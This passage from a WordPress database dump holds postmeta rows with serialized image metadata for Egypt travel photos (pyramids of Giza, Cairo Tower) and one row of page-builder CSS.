(21607,3354,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:984;s:6:\"height\";i:322;s:4:\"file\";s:17:\"2022/11/main1.jpg\";s:8:\"filesize\";i:95392;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"main1-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9356;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"main1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7272;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"main1-768x251.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42954;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"main1-500x164.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21492;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:17:\"main1-800x262.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45476;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(21609,3355,'_wpb_shortcodes_custom_css','.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(21610,3356,'_wp_attached_file','2022/11/egyptian-pyramids_main.jpg'),
(21611,3356,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:34:\"2022/11/egyptian-pyramids_main.jpg\";s:8:\"filesize\";i:895867;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_main-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11840;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"egyptian-pyramids_main-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108843;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_main-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7388;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_main-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64619;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_main-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29654;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_main-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70227;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:35:\"egyptian-pyramids_main-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161061;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21612,3357,'_wp_attached_file','2022/11/egyptian-pyramids_main-1.jpg'),
(21613,3357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:36:\"2022/11/egyptian-pyramids_main-1.jpg\";s:8:\"filesize\";i:891166;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-1-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11458;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"egyptian-pyramids_main-1-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108245;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7290;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-1-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64574;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-1-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29314;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-1-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69692;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:37:\"egyptian-pyramids_main-1-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160505;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21614,3358,'_wp_attached_file','2022/11/egyptian-pyramids_main-2.jpg'),
(21615,3358,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:36:\"2022/11/egyptian-pyramids_main-2.jpg\";s:8:\"filesize\";i:891166;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-2-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11458;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"egyptian-pyramids_main-2-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108245;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7290;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-2-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64574;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-2-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29314;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-2-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69692;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:37:\"egyptian-pyramids_main-2-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160505;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21617,3359,'_wp_attached_file','2022/11/egyptian-pyramids_main-3.jpg'),
(21618,3359,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:36:\"2022/11/egyptian-pyramids_main-3.jpg\";s:8:\"filesize\";i:890713;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-3-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11462;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"egyptian-pyramids_main-3-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108028;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7289;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-3-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64519;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-3-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29340;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:36:\"egyptian-pyramids_main-3-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69578;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:37:\"egyptian-pyramids_main-3-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160291;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D800\";s:7:\"caption\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:8:\"Bigstock\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:46:\"Egyptian pyramids in sand desert and clear sky\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21619,3360,'_wp_attached_file','2022/11/1-Cairo-Tower-1.jpg'),
(21620,3360,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:650;s:6:\"height\";i:434;s:4:\"file\";s:27:\"2022/11/1-Cairo-Tower-1.jpg\";s:8:\"filesize\";i:31188;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"1-Cairo-Tower-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10974;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"1-Cairo-Tower-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5294;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:27:\"1-Cairo-Tower-1-500x334.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25242;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(21621,3361,'_wp_attached_file','2022/11/Egypt.jpg'),
(21622,3361,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:17:\"2022/11/Egypt.jpg\";s:8:\"filesize\";i:786381;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"Egypt-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16061;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"Egypt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6686;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"Egypt-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90619;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"Egypt-500x334.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42653;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:17:\"Egypt-800x534.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21623,3362,'_wp_attached_file','2022/11/slide9-1.jpg'),
(21624,3362,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:20:\"2022/11/slide9-1.jpg\";s:8:\"filesize\";i:409283;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"slide9-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19969;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"slide9-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172221;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"slide9-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8391;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"slide9-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105582;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:20:\"slide9-1-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49845;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:20:\"slide9-1-800x533.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:533;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114246;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(21625,3363,'_wp_attached_file','2022/11/pyramids-of-Giza-in-Egypt1.jpg'),
(21626,3363,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1800;s:6:\"height\";i:891;s:4:\"file\";s:38:\"2022/11/pyramids-of-Giza-in-Egypt1.jpg\";s:8:\"filesize\";i:753052;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt1-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10569;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt1-1024x507.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86339;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6405;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt1-768x380.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53173;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt1-1536x760.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:760;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162396;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt1-500x248.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24826;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt1-800x396.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:396;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56800;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt1-1280x634.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:634;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122783;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21627,3364,'_wp_attached_file','2022/11/pyramids-of-Giza-in-Egypt11.jpg'),
(21628,3364,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2121;s:6:\"height\";i:598;s:4:\"file\";s:39:\"2022/11/pyramids-of-Giza-in-Egypt11.jpg\";s:8:\"filesize\";i:286584;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"pyramids-of-Giza-in-Egypt11-300x85.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8315;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"pyramids-of-Giza-in-Egypt11-1024x289.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63131;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7199;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt11-768x217.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39210;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:40:\"pyramids-of-Giza-in-Egypt11-1536x433.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118663;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:40:\"pyramids-of-Giza-in-Egypt11-2048x577.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:181484;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt11-500x141.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19166;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:39:\"pyramids-of-Giza-in-Egypt11-800x226.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42009;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:40:\"pyramids-of-Giza-in-Egypt11-1280x361.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:361;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89183;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:40:\"pyramids-of-Giza-in-Egypt11-1920x541.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165134;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21629,3365,'_wp_attached_file','2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg'),
(21630,3365,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1114;s:4:\"file\";s:56:\"2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg\";s:8:\"filesize\";i:589161;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"cairo-egypt_shutterstock_1421974805-1-300x131.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12233;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"cairo-egypt_shutterstock_1421974805-1-1024x446.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:446;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111957;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"cairo-egypt_shutterstock_1421974805-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7189;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:49:\"cairo-egypt_shutterstock_1421974805-1-768x334.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:334;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65549;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:50:\"cairo-egypt_shutterstock_1421974805-1-1536x669.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:669;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239180;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"cairo-egypt_shutterstock_1421974805-1-2048x892.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:892;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:402371;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:49:\"cairo-egypt_shutterstock_1421974805-1-500x218.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30481;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:49:\"cairo-egypt_shutterstock_1421974805-1-800x348.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70918;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:50:\"cairo-egypt_shutterstock_1421974805-1-1280x557.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:557;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170162;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:50:\"cairo-egypt_shutterstock_1421974805-1-1920x836.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:836;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:359387;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0